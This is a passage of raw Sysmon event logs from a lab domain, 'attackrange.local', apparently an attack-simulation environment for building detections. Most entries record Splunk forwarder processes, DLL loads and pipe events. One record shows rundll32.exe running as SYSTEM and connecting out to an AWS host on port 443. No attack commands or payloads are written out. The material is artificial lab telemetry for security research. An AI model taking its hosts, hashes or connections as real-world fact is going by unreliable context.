Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057350258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.526{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057350257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:08.525{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:08.525{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:08.525{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:08.525{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:08.525{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:08.525{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x800000000000000021219903Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.612{AD5E2759-5BBC-618E-17CE-08000000F101}58802492C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219902Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.331{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5BBC-618E-17CE-08000000F101}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219901Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.331{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219900Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.331{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219899Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.331{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219898Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.331{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219897Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.331{AD5E2759-5432-6143-0500-00000000F101}412980C:\Windows\system32\csrss.exe{AD5E2759-5BBC-618E-17CE-08000000F101}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219896Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.331{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5BBC-618E-17CE-08000000F101}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219895Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.316{AD5E2759-5BBC-618E-17CE-08000000F101}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000057350251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:38.511{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54575-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 534500x800000000000000057350250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.106{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057350249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.106{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057350248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.106{8B6011A9-5BBB-618E-62F3-04000000F101}98445676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.106{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057350246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.106{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057350482Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.792{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350481Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.791{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5F393F87E7B8221F31DB689DCA24C77,SHA256=57925BB041D3A2F34DCDC98AE92370337EF7FD8ACCED57B5D91AE77508572E46falsetrue 734700x800000000000000057350480Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.746{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057350479Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.745{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057350478Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.744{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057350477Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.743{8B6011A9-5BBD-618E-65F3-04000000F101}8236\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057350476Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.743{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057350475Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.742{8B6011A9-5BBD-618E-65F3-04000000F101}8236\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057350474Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.741{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057350473Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.741{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057350472Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.741{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057350471Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.740{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057350470Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.732{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057350469Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.732{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057350468Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.732{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057350467Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.731{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057350466Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.731{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057350465Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.729{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057350464Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.729{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057350463Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.728{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057350462Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.728{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057350461Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.728{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057350460Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.728{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057350459Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.728{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057350458Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.728{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057350457Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.728{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program 